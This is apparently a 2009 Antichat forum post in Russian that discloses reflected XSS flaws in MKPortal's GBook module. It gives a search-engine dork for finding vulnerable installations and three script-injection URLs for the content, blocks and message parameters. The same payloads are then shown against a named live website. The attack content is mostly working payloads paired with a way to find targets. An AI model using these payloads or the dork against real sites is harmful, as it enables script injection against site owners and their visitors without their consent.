25.01.2009, 00:43
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
уязвимости компонентов MKPortal
Multiple pXSS в MKPortal module GBook
Уязвимый продукт: MKPortal module gbook
Дорк: "inurl:index.php?ind=gbook"
1. Multiple pXSS
Уязвимость в файле index.php.
Exploit:
Код:
/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E
Example:
Код:
http://otradnoe.ru.net//index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E
__________________
Появляюсь редко. Важные дела в реале.
|
|
|